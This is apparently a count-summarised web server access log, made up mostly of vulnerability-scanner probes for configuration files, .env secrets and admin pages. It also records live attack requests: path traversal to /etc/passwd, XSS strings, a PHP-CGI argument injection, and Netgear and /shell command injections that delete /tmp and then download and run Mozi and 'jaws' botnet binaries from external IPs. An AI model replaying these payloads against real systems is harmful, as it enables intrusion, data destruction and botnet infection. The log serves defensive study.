1 GET /photo/lang/ENG.js HTTP/1.1
16 GET /php-info.php HTTP/1.1
16 GET /php.ini HTTP/1.1
16 GET /php.php HTTP/1.1
1 GET /php/php.exe?c:\\winnt\\win.ini HTTP/1.1
16 GET /phpinfo.php HTTP/1.1
16 GET /phpinfo HTTP/1.1
16 GET /phpversion.php HTTP/1.1
16 GET /pinfo.php HTTP/1.1
1 GET /platform-ui/ HTTP/1.1
1 GET /plc/webvisu.htm HTTP/1.1
1 GET /pls/apex/f?p=nessuscheck HTTP/1.1
1 GET /pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /pluto/portal/ HTTP/1.1
1 GET /portal/diag/index.jsp HTTP/1.1
1 GET /portal/page/portal/Design_Time_PG/Welcome HTTP/1.1
1 GET /portal/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW HTTP/1.1
1 GET /portal HTTP/1.1
16 GET /prod/.env HTTP/1.1
2 GET /properties/configuration.php?tab=Status HTTP/1.1
1 GET /properties/description.dhtml HTTP/1.1
1 GET /ptz.htm HTTP/1.1
16 GET /public/.env HTTP/1.1
1 GET /public/ HTTP/1.1
1 GET /puppet-ca/v1/certificate/13.67.44.234 HTTP/1.1
1 GET /puppet/v3/facts/13.67.44.234 HTTP/1.1
2 GET /qip HTTP/1.1
1 GET /qsoap.qap HTTP/1.1
3 GET /query.cgi HTTP/1.1
1 GET /query.idq?CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
1 GET /query.idq?CiTemplate=../../../../../winnt/win.ini HTTP/1.1
1 GET /qwe/qwe/index.html HTTP/1.1
1 GET /rails_info/properties HTTP/1.1
1 GET /rcladmin/js/art_i18n/nls/art_i18n.js HTTP/1.1
1 GET /rdweb/login/login.html HTTP/1.1
1 GET /recoveryconsole/ HTTP/1.1
1 GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
1 GET /reporter/client.jsp HTTP/1.1
1 GET /rest-service/reviews-v1/versionInfo HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /ruei/index.php HTTP/1.1
1 GET /s14i1ThE.asmx HTTP/1.1
1 GET /sabin/SiteAdmin.htm HTTP/1.1
1 GET /sapmc/sapmc.html HTTP/1.1
1 GET /sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
1 GET /sc3/console.php?psid=101 HTTP/1.1
1 GET /scgi-bin/platform.cgi HTTP/1.1
1 GET /scmadmin/LocalIndex.html HTTP/1.1
1 GET /scmadmin/ HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.asp HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.cfm HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.cgi HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.html HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.inc HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.php3 HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.php HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.pl HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.sh HTTP/1.1
1 GET /scripts/TPkUcUa6K4ZL.shtml HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/w3who.dll HTTP/1.1
1 GET /search/results.stm HTTP/1.1
1 GET /search?NS-query-pat=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
16 GET /secrets.yml HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?Init+0 HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?ver HTTP/1.1
1 GET /self_upgrade.html HTTP/1.1
2 GET /server-info HTTP/1.1
2 GET /server-status HTTP/1.1
16 GET /server/config.json HTTP/1.1
1 GET /servlet/SnoopServlet/ HTTP/1.1
1 GET /servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet HTTP/1.1
1 GET /servlet/snoop/ HTTP/1.1
1 GET /servlet/snoopservlet/ HTTP/1.1
1 GET /servlet/webacc?User.lang=<script>foo</script> HTTP/1.1
1 GET /servlet/webacc?error=webacc HTTP/1.1
3 GET /session_login.cgi HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//112[.]237[.]83[.]158:44907/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]194[.]153[.]85:39787/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup/setup-/../../log.jsp?log=info&mode=asc&lines=10 HTTP/1.1
1 GET /setup HTTP/1.1
1 GET /sgdadmin/faces/jsp/Version.jsp HTTP/1.1
1 GET /sgms/login HTTP/1.1
1 GET /shared/userlogin.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185[.]216[.]71[.]192/jaws;sh+/tmp/jaws HTTP/1.1
3 GET /show_bug.cgi HTTP/1.1
3 GET /sitemap.xml HTTP/1.1
1 GET /sitemap/sitemap.xml HTTP/1.1
1 GET /smadmr5.nsf HTTP/1.1
1 GET /smconf.nsf HTTP/1.1
1 GET /smency.nsf HTTP/1.1
1 GET /smftypes.nsf HTTP/1.1
1 GET /smhelp.nsf HTTP/1.1
1 GET /smmsg.nsf HTTP/1.1
1 GET /smquar.nsf HTTP/1.1
1 GET /smsmvlog.nsf HTTP/1.1
1 GET /smtime.nsf HTTP/1.1
1 GET /snmx-cgi/fxm.exe HTTP/1.1
1 GET /snoop/ HTTP/1.1
1 GET /snoopservlet/ HTTP/1.1
1 GET /solr/# HTTP/1.1
1 GET /someunexistantantsutff.exe HTTP/1.1
1 GET /someunexistantantsutff8210929651193109408.html HTTP/1.1
1 GET /spotfire/about.jsp HTTP/1.1
1 GET /spywall/login.php HTTP/1.1
1 GET /ssp// HTTP/1.1
1 GET /start.js HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /status.php3 HTTP/1.1
1 GET /status.xsl. HTTP/1.1
1 GET /stcenter.nsf HTTP/1.1
1 GET /stream/0 HTTP/1.1
1 GET /stronghold-info HTTP/1.1
1 GET /stronghold-status HTTP/1.1
1 GET /struts/webconsole.html HTTP/1.1
1 GET /sws/data/sws_data.js HTTP/1.1
1 GET /swvm/ConsoleContainer.jsp HTTP/1.1
1 GET /syslog.htm HTTP/1.1
1 GET /system.xml HTTP/1.1
1 GET /system/console?version=1.5 HTTP/1.1
2 GET /system/login HTTP/1.1
1 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap HTTP/1.1
16 GET /temp.php HTTP/1.1
3 GET /test.cgi HTTP/1.1
1 GET /test.js HTTP/1.1
16 GET /test.php HTTP/1.1
3 GET /test HTTP/1.1
1 GET /this_page_should_not_exist.htm HTTP/1.1
1 GET /this_server/all_settings.shtml HTTP/1.1
1 GET /tightvnc-jviewer.jar HTTP/1.1
16 GET /time.php HTTP/1.1
1 GET /tlI5krQr.soap HTTP/1.1
1 GET /tmui/ HTTP/1.1
1 GET /trace.axd HTTP/1.1
1 GET /trc HTTP/1.1
1 GET /triton-help/en/first.htm HTTP/1.1
1 GET /tsp// HTTP/1.1
16 GET /twitter/.env HTTP/1.1
3 GET /ucsm/isSamInstalled.cgi HTTP/1.1
1 GET /uddi/default.aspx HTTP/1.1
1 GET /uddipublic/default.aspx HTTP/1.1
2 GET /ui/ HTTP/1.1
1 GET /ui/faces/Login.xhtml HTTP/1.1
1 GET /ui/login.action HTTP/1.1
1 GET /ui/login/ HTTP/1.1
1 GET /unified-console.html HTTP/1.1
1 GET /update.php?op=info HTTP/1.1
1 GET /upnp/BasicDevice.xml HTTP/1.1
1 GET /usage/ HTTP/1.1
1 GET /user_settings.cfg HTTP/1.1
1 GET /userportal/webpages/myaccount/login.jsp HTTP/1.1
1 GET /users/sign_in HTTP/1.1
1 GET /v2.0/environments/13.67.44.234 HTTP/1.1
1 GET /vTXYdCFs.aspx HTTP/1.1
1 GET /version HTTP/1.1
1 GET /view.html HTTP/1.1
1 GET /view/hsrindex.shtml HTTP/1.1
1 GET /view/view.shtml HTTP/1.1
1 GET /vncviewer.jar HTTP/1.1
1 GET /vpn/ HTTP/1.1
1 GET /vsapres/web20/core/login.aspx HTTP/1.1
1 GET /vsmc.html HTTP/1.1
1 GET /wavemaster.internal HTTP/1.1
1 GET /wcd/system.xml HTTP/1.1
1 GET /web-console/ServerInfo.jsp%00 HTTP/1.1
1 GET /web-console/ServerInfo.jsp HTTP/1.1
1 GET /web-determinations/?CookieSet=true HTTP/1.1
1 GET /web.config HTTP/1.1
1 GET /web/#/login HTTP/1.1
1 GET /web/ HTTP/1.1
1 GET /web/signin HTTP/1.1
1 GET /webalizer/ HTTP/1.1
1 GET /webapp/js/UI_String.en-US.js HTTP/1.1
1 GET /webapps/login/index.html HTTP/1.1
1 GET /webconsole/webpages/login.jsp HTTP/1.1
1 GET /webct/about.jsp HTTP/1.1
1 GET /webhost HTTP/1.1
1 GET /webman/info.cgi?host= HTTP/1.1
3 GET /whois.cgi HTTP/1.1
1 GET /wls-wsat/CoordinatorPortType HTTP/1.1
1 GET /wls_utc/ HTTP/1.1
16 GET /wp-config.php-backup HTTP/1.1
16 GET /wp-config.php.bak HTTP/1.1
16 GET /wp-config.php.old HTTP/1.1
3 GET /wp-login.php HTTP/1.1
1 GET /wrcontrollite.ssi HTTP/1.1
1 GET /ws_utc/login.do HTTP/1.1
3 GET /wwwadmin.cgi HTTP/1.1
3 GET /wwwboard.cgi HTTP/1.1
1 GET /xR2wm8zF.rem HTTP/1.1
3 GET /xampp/cgi.cgi HTTP/1.1
1 GET /xampp/index.php HTTP/1.1
1 GET /xmldata?item=All HTTP/1.1
1 GET /xmldata?item=all HTTP/1.1
1 GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.1
1 GET /~nobody/etc/passwd HTTP/1.1
1 GET 1665325683:@13.67.44.234/ HTTP/1.1
1 GET 1665325683:@13.67.44.234/
1 GET <meta%20http-equiv=Set-Cookie%20content=%22testluua=8196%22> HTTP/1.1
1 GET <script>document.cookie=%22testluua=8196;%22</script> HTTP/1.1
1 GET c:\\boot.ini HTTP/1.1
1 GET http[:]//13[.]67[.]44[.]234/authentication/login/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//rfi[.]nessus[.]org/check_proxy.html HTTP/1.0
2 HEAD / HTTP/1.1
1 HEAD /someunexistantstuff.exe HTTP/1.1
1 HEAD /someunexistantstuff17848208532047955014.html HTTP/1.1
1 NESSUS / HTTP/1.0
2 OPTIONS * HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /%70%68%70%70%61%74%68/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
1 POST /FormHandler.cgi HTTP/1.1
1 POST /av-centerd HTTP/1.1
1 POST /blazeds/messagebroker/http HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/file_transfer.cgi HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /flex2gateway/http HTTP/1.1
1 POST /index.php?s=xxxx HTTP/1.1
1 POST /jsonrpc HTTP/1.1
1 POST /lcds/messagebroker/http HTTP/1.1
1 POST /messagebroker/http HTTP/1.1
1 POST /perl/ HTTP/1.1
1 POST /sawmill6cl.exe HTTP/1.1
1 POST /sawmillcl.exe HTTP/1.1
1 POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
7 POST /servlet/GetProductVersion HTTP/1.1
1 POST /something/maybe/ping HTTP/1.1
1 POST /spipe?Source=nessus HTTP/1.0
1 POST /webui/apps/sdcss HTTP/1.1
1 POST http[:]//127[.]0[.]0[.]1/iControl/iControlPortal.cgi HTTP/1.1
5 PRI * HTTP/2.0
1 PROPFIND / HTTP/1.1
1 PUT /_SIgiXHyByLp HTTP/1.1
1 RPRAGJ / HTTP/1.1
1 SEARCH / HTTP/1.1
1 Secure * Secure-HTTP/1.4
1 TRACE /Nessus961959040.html HTTP/1.1
1 some invalid request
1 t3 12.2.1